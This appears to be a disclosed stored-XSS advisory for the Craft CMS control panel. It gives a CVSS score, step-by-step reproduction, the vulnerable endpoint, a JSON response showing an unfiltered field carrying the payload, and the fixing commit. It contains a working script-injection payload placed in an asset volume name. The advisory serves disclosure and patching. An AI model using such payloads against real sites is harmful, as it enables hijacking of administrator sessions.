CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
EPSS
Percentile
40.0%
XSS can be triggered by review volumes
1. Access setting tab
2. Create new assets
3. In assets name inject payload: "<script>alert(1337)</script>
4. Click Utilities tab
5. Choose all volumes, or volume trigger xss
6. Click Update asset indexes.
7. Wait to assets update success.
8. Progress complete.
9. Click on review button will trigger XSS
Function: index.php?p=admin/actions/asset-indexes/process-indexing-session&v=1680710595770
After loading completed, progess will load:
“skippedEntries”
and
“missingEntries”
These parameters is not yet filtered, I just tried “skippedEntries” but I think it will be work with “missingEntries”
{
“session”: {
“id”: 10,
“indexedVolumes”: {
“6”: “"<script>alert(1337)</script>”
},
“totalEntries”: 2235,
“processedEntries”: 2235,
“cacheRemoteImages”: true,
“listEmptyFolders”: false,
“isCli”: false,
“actionRequired”: true,
“dateCreated”: “Apr 5, 2023, 9:03:16 AM”,
“skippedEntries”: [
“"<script>alert(1337)</script>/assetpreviews/Image.php”,
“"<script>alert(1337)</script>/assetpreviews/Pdf.php”
],
“missingEntries”: {
“folders”: [],
“files”: []
},
“processIfRootEmpty”: false
},
“skipDialog”: false
}
Resolved in https://github.com/craftcms/cms/commit/053d7119697e480ff81c5723bb9a33eaa49e0fc7